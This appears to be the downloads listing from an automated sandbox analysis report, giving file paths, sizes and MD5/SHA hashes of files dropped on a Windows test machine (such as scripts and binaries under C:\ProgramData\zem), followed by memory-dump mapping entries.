Downloads
-
C:\ProgramData\chocolatey\choco.exeFilesize
7.3MB
MD5cb3a19901a422660c36a96284b125b29
SHA1b31020d098e898d3e6e74e46a3be2db375272779
SHA2569078bd7a82267c4605dcdf4d4ad8d03150cd9eec84c88965a3fcd4193cf1f8d7
SHA5121c6a0d305f0cd0c1d1dfe799c172cbe55503bd940557a67a42758b8d2f3e9707522df9e5d71113915edc4ee3c3714ec899c4452dee897596c7fb01dd6ccc4a68
-
C:\ProgramData\chocolatey\choco.exeFilesize
7.3MB
MD5cb3a19901a422660c36a96284b125b29
SHA1b31020d098e898d3e6e74e46a3be2db375272779
SHA2569078bd7a82267c4605dcdf4d4ad8d03150cd9eec84c88965a3fcd4193cf1f8d7
SHA5121c6a0d305f0cd0c1d1dfe799c172cbe55503bd940557a67a42758b8d2f3e9707522df9e5d71113915edc4ee3c3714ec899c4452dee897596c7fb01dd6ccc4a68
-
C:\ProgramData\zem\run.batFilesize
2KB
MD58b3dedfae44579dbb69419c1b7f39cb3
SHA19955cf4cae7f8338286a2891aa357ba6168138e8
SHA256a1277bd1956b02a2f759ad30eca3215ba2c83eab72dfa9f815d39564bc4a9e1c
SHA512ff95d8854dd0b017bbe1cec582b3d504e53dad65729034d1ee69d9313cc4279fa9ea0f61f698b04f9a3c3c174260805212b46d606a672538f8c6b56bf9d50fa7
-
C:\ProgramData\zem\start.batFilesize
415B
MD5e808c807fb41cb9a2fc8714b1a5cd048
SHA12c7843c932301f6ceed5ace6753999eb0bc83366
SHA2563ee70cf43535fc65581f3edf34674e8f2769e661911ba7cf2dcb359cedf40fb8
SHA512de65ddc77e1542a653dc049d4d5dcbab03bd7b63921844d6a4b4cf6c12c33d0c0ae27ff7f38d6cbd8c2708fb4e2b8ad4d8ea8434e3d3b491cf805aafe9a201ad
-
C:\ProgramData\zem\start.ps1Filesize
1KB
MD5bf8561246e2dad06c4ce34b397e874d3
SHA147fd915a1094f373f445186b438703de228481a6
SHA256c57a761935e8b3a9cf697f6d1ad069cc839bb98ea79beeb5ad635802ce10500d
SHA51245047c45e6964859b601593647489e2440a1b0ff8c1a826fcd35a5f945275410cff79d4d4b95ee378c63b818db8fac999f7b620e6722da68119ee07c726bae5e
-
C:\ProgramData\zem\tmp.exeFilesize
532KB
MD5cba9caa64e418a546044daa8744800b3
SHA172060361b8a025ea3e132f6015cb20a87d3dff44
SHA2569aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
SHA512aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129
-
C:\ProgramData\zem\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\ProgramData\zem\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\ProgramData\zem\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5fe3aab3ae544a134b68e881b82b70169
SHA1926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA5123fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c5e9b9cd25ed3f12b42381eed720f66c
SHA1940a2ff87a60bf3cef0688520c16d8560a465d0c
SHA25654b57c9f9b168348e3cdcb1e7e41500602a2267d35c71675810aa34fca004164
SHA5127136952640574008e1d38a5737f150f044205ed0fca86d5455e208c8b636a57b55b1e5ce9defd331e8b0431775b979a409f9abb27ef0b01429cc30c21e7e9b37
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5692a440f9cfbeaf648632aead685a5a1
SHA1e4e4bd8405be77294f4be5ea18b5e05b139f35af
SHA2563e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4
SHA512c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5e5b84d9e354fd09e2bb5c57546905f44
SHA1902c3fa5acd848e053da89d434fea41933e98d78
SHA2567615b74b755b33bde20d6026bd14a1cb1866d3013b9dc231a3dfeb071b4e29d2
SHA5127531296d1d190e3e6b4be560658e939d8c6fdec5d22b50a6068a66feb2a85a36715d12170d14c52d27d4fe57184e9297b029732401033ede186cc446b481c1e9
-
C:\Users\Admin\AppData\Local\Temp\RESA2AD.tmpFilesize
1KB
MD54b014ab5e2f04258527b1faf9717890f
SHA11f50e968ff7a264173661331688af01137a654f4
SHA256d700f55ada9a9e601da68e977854dd734b5b1e16d0793ff67b541c6504e60682
SHA5128a023a89aa9a5ca18b8a15275d78a22f96b425783393440b0f8b62a8df7ce4e031003eaaecbad2d7547d617b4d02e6c4e15f50efe2c8f4e4c43f32afe096cbf9
-
C:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.dllFilesize
3KB
MD56aec9f305454797aff7a96c0b3efff4d
SHA1299cd53129e8bc1d18ea734c05211ed154cb5236
SHA256c5b124cdffd31f3d5224878bb1594e2221d1431c4a4dd452fee0a5f85dc9c6a7
SHA512e0d4cc98e7f316e86cad5ba51f616310c5d2db6840d21fa25a034378832b1ad4c5332af9df8c96b4d98ce2c3a49360003404c2bbb1c312ffad59cba42a156c19
-
\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\CSCA5BC580AF6EE420E902A6861B0103F6C.TMPFilesize
652B
MD5df02626815bf271a859b37e6d143d96d
SHA186144242dbcf2e59034398440ae0f855c5cd2f2c
SHA256dc867d9227477c215e1d68c97d90c1d9c854fbb6ed057ac40b9c2a7184b53421
SHA512f4a44c7e8cde0f7812abf7ea31e071232f18eed97693527b8dc60e2d430dbfabf8453fd92571b04f5e33b03c8cb4d6fd83a7ea8911281488299e56252bb3c239
-
\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.0.csFilesize
363B
MD5fe0a20ae8ae6560ff6da930c7a650c80
SHA1b17a90207c3fd39abfcd37a79428961d401c0de6
SHA2562887d6cced4527e90685dea484f31e882a7352ca66bdb5f5c7dd8924b6885dce
SHA512d2505e75392877bc4bff0b9b145da35fb2c4fea86c6c6ee3ec7af06fb774abb27dd651242f6797e0e81127619a64662874cc1623262607de65fb332848de4531
-
\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.cmdlineFilesize
369B
MD56a80b1cb12e12d1aacbce1736d5951b3
SHA15d563403102262f74f41c688474e4d649295ed35
SHA25671c86045ff58eb88a33c6ee52bfa275d257109ef428309aa8de3d18bfd10e9fb
SHA5123431cafd3a6abcb7e66e0b029be7a7b2bdc11aeb421cb4798f58441eda8dce8457560db9fc3c179be95b53898cd0a7235fcae6cb19690de5e27b9318d7ddb7ff
-
memory/388-137-0x0000000000000000-mapping.dmp
-
memory/644-133-0x0000000000000000-mapping.dmp
-
memory/644-186-0x0000000000000000-mapping.dmp
-
memory/736-193-0x0000000000000000-mapping.dmp
-
memory/976-195-0x0000000000000000-mapping.dmp
-
memory/992-179-0x0000000000000000-mapping.dmp
-
memory/1084-135-0x0000000000000000-mapping.dmp
-
memory/1104-182-0x0000000000000000-mapping.dmp
-
memory/1144-196-0x0000000000000000-mapping.dmp
-
memory/1180-139-0x0000000000000000-mapping.dmp
-
memory/1188-161-0x0000000000000000-mapping.dmp
-
memory/1264-224-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmpFilesize
10.8MB
-
memory/1264-217-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmpFilesize
10.8MB
-
memory/1264-208-0x00000260F1EB0000-0x00000260F1EBA000-memory.dmpFilesize
40KB
-
memory/1264-207-0x00000260F1ED0000-0x00000260F1EE2000-memory.dmpFilesize
72KB
-
memory/1264-205-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmpFilesize
10.8MB
-
memory/1264-204-0x00000260F1210000-0x00000260F1232000-memory.dmpFilesize
136KB
-
memory/1264-183-0x0000000000000000-mapping.dmp
-
memory/1292-164-0x0000000000000000-mapping.dmp
-
memory/1320-187-0x0000000000000000-mapping.dmp
-
memory/1340-156-0x0000000000000000-mapping.dmp
-
memory/1340-232-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmpFilesize
10.8MB
-
memory/1412-169-0x0000000000000000-mapping.dmp
-
memory/1504-140-0x0000000000000000-mapping.dmp
-
memory/1592-178-0x0000000000000000-mapping.dmp
-
memory/1644-158-0x0000000000000000-mapping.dmp
-
memory/1688-198-0x0000000000000000-mapping.dmp
-
memory/1864-132-0x0000000000000000-mapping.dmp
-
memory/1864-180-0x0000000000000000-mapping.dmp
-
memory/1912-144-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/1912-141-0x0000000000000000-mapping.dmp
-
memory/2056-185-0x0000000000000000-mapping.dmp
-
memory/2120-157-0x0000000000000000-mapping.dmp
-
memory/2128-181-0x0000000000000000-mapping.dmp
-
memory/2164-200-0x0000000000000000-mapping.dmp
-
memory/2240-173-0x0000000000000000-mapping.dmp
-
memory/2552-237-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmpFilesize
10.8MB
-
memory/2552-235-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmpFilesize
10.8MB
-
memory/2576-202-0x0000000000000000-mapping.dmp
-
memory/2648-188-0x0000000000000000-mapping.dmp
-
memory/2660-201-0x0000000000000000-mapping.dmp
-
memory/2676-197-0x0000000000000000-mapping.dmp
-
memory/2832-172-0x0000000000000000-mapping.dmp
-
memory/2928-190-0x0000000000000000-mapping.dmp
-
memory/2960-149-0x0000000000000000-mapping.dmp
-
memory/3060-163-0x0000000000000000-mapping.dmp
-
memory/3424-138-0x0000000000000000-mapping.dmp
-
memory/3468-165-0x0000000000000000-mapping.dmp
-
memory/3476-162-0x0000000000000000-mapping.dmp
-
memory/3560-194-0x0000000000000000-mapping.dmp
-
memory/3572-191-0x0000000000000000-mapping.dmp
-
memory/3596-166-0x0000000000000000-mapping.dmp
-
memory/3660-153-0x0000000000000000-mapping.dmp
-
memory/3772-199-0x0000000000000000-mapping.dmp
-
memory/3780-145-0x0000000000000000-mapping.dmp
-
memory/3780-147-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/3780-148-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/3820-152-0x0000000000000000-mapping.dmp
-
memory/3824-192-0x0000000000000000-mapping.dmp
-
memory/3912-184-0x0000000000000000-mapping.dmp
-
memory/4088-177-0x0000000000000000-mapping.dmp
-
memory/4092-216-0x0000000000AD0000-0x000000000121A000-memory.dmpFilesize
7.3MB
-
memory/4092-223-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmpFilesize
10.8MB
-
memory/4092-218-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmpFilesize
10.8MB
-
memory/4092-219-0x0000000001780000-0x00000000017A0000-memory.dmpFilesize
128KB
-
memory/4092-220-0x000000001D280000-0x000000001D2D0000-memory.dmpFilesize
320KB
-
memory/4092-221-0x000000001D350000-0x000000001D3C6000-memory.dmpFilesize
472KB
-
memory/4092-222-0x0000000001A40000-0x0000000001A5E000-memory.dmpFilesize
120KB
-
memory/4224-171-0x0000000000000000-mapping.dmp
-
memory/4268-136-0x0000000000000000-mapping.dmp
-
memory/4280-150-0x0000000000000000-mapping.dmp
-
memory/4288-175-0x0000000000000000-mapping.dmp
-
memory/4352-189-0x0000000000000000-mapping.dmp
-
memory/4356-168-0x0000000000000000-mapping.dmp
-
memory/4464-227-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmpFilesize
10.8MB
-
memory/4464-228-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmpFilesize
10.8MB
-
memory/4544-167-0x0000000000000000-mapping.dmp
-
memory/4684-170-0x0000000000000000-mapping.dmp
-
memory/4708-176-0x0000000000000000-mapping.dmp
-
memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmpFilesize
1.3MB
-
memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmpFilesize
1.3MB
-
memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmpFilesize
1.3MB
-
memory/4780-154-0x0000000000000000-mapping.dmp
-
memory/4796-160-0x0000000000000000-mapping.dmp
-
memory/4888-174-0x0000000000000000-mapping.dmp
-
memory/5016-155-0x0000000000000000-mapping.dmp
-
memory/5072-203-0x0000000000000000-mapping.dmp
-
memory/5116-159-0x0000000000000000-mapping.dmp